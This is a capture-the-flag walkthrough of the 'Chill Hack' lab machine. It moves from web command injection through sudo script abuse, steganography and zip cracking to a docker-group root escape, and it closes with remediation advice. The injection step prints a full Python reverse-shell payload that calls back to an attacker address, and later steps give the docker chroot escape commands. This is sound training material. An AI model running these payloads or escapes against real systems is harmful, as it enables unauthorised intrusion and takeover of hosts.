Target IP: chillhack.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

“Chill Hack” is a Linux machine featuring a vulnerable web application that allows for Command Injection, granting initial access as www-data. Lateral movement to the user apaar is achieved by exploiting a script (.helpline.sh) that permits arbitrary command execution. Further lateral movement to anurodh involves extracting credentials hidden inside a JPEG image via Steganography. Privilege escalation to Root is accomplished by abusing membership in the docker group to mount the host filesystem into a container, effectively bypassing filesystem restrictions.

Key TTPs (MITRE ATT&CK):

  • T1059.003 (Command and Scripting Interpreter): Command Injection via Web UI.
  • T1078 (Valid Accounts): Switching users via sudo and su.
  • T1027 (Obfuscated Files or Information): Steganography (steghide) on images.
  • T1110 (Brute Force): Cracking Zip passwords (zip2john).
  • T1611 (Escape to Host): Docker container escape via volume mounting.

2. Operational Setup

Host Configuration

echo "10.10.x.x chillhack.thm" | sudo tee -a /etc/hosts

3. Initial Access: Command Injection

Context: You mentioned starting with a reverse shell. On this box, the web interface has a “Command” field.

  1. Enumeration: The website features a tool that allows users to run commands (like ls, id).
  2. Exploitation: We inject a payload to bypass the filter and execute a reverse shell.
# Payload example
ls; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.YOUR.IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
  1. Status: Shell as www-data.

4. Lateral Movement 1: The Helpline Script

Enumeration

We list files in home directories or run sudo -l.

sudo -l
# User www-data may run the following commands on chillhack:
#     (apaar) NOPASSWD: /home/apaar/.helpline.sh

Analysis

We can run this script as the user apaar without a password. Let’s inspect the script:

cat /home/apaar/.helpline.sh
# It likely asks for input and executes it, or spawns a shell ($msg 2> /dev/null).

Exploitation

We run the script and ask for a shell.

sudo -u apaar /home/apaar/.helpline.sh
# Prompt: "Enter message to send to helpline"
/bin/bash

Status: User apaar. User Flag: /home/apaar/user.txt.


5. Lateral Movement 2: Steganography

Enumeration

We find a directory /var/www/files/images containing standard images. You transferred these to your local machine (using Python http.server or scp).

Steganography Analysis

We check the images for hidden data using Steghide.

steghide extract -sf hacker-with-laptop.jpg
# Passphrase: (Try empty) -> Succcess!
  • Result: Extracted backup.zip.

Cracking the Zip

The zip file is password protected.

  1. Hash Extraction:
zip2john backup.zip > zip.hash
  1. Cracking:
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
# Password found: pass1word (example)
  1. Extraction: Unzip the file to find source_code.php (or similar). Inside, there is a base64 encoded password string.
echo "BASE64_STRING" | base64 -d
# Result: New Password for Anurodh

Access

su anurodh
# Enter decoded password

Status: User anurodh.


6. Privilege Escalation: Docker Escape

Enumeration

We check the groups anurodh belongs to.

id
# uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)

Critical Finding: Membership in the docker group.

The Vulnerability (GTFOBins)

Being in the docker group is essentially equivalent to being Root. We can spin up a container and mount the entire host filesystem (/) into the container. We can then modify host files from inside the container.

Exploitation

# docker run -v /:/mnt --rm -it <image> chroot /mnt sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Breakdown:

  • -v /:/mnt: Mount the host’s root directory (/) to the container’s /mnt directory.
  • --rm: Delete container after exit (clean up).
  • -it: Interactive TTY.
  • alpine: The image to use (lightweight).
  • chroot /mnt sh: Change the root directory of the process to /mnt (which is the host’s actual root) and spawn a shell.

Result: You are now inside the host filesystem as root.

# whoami
root
cat /root/root.txt

7. Remediation (Blue Team)

  1. Web Input Validation: Implement strict input sanitization on the “Command” web interface to prevent arbitrary command execution.
  2. Sudo Privileges: The .helpline.sh script allows arbitrary execution. It should not be runnable via sudo, or it should be rewritten to accept only specific, safe arguments.
  3. Docker Group Security:
  • Do not add standard users to the docker group. It is a known privilege escalation vector.
  • Use Rootless Docker if users need to run containers without root privileges.
  1. Sensitive Data: Remove sensitive passwords embedded in source code or hidden in image files on public-facing servers.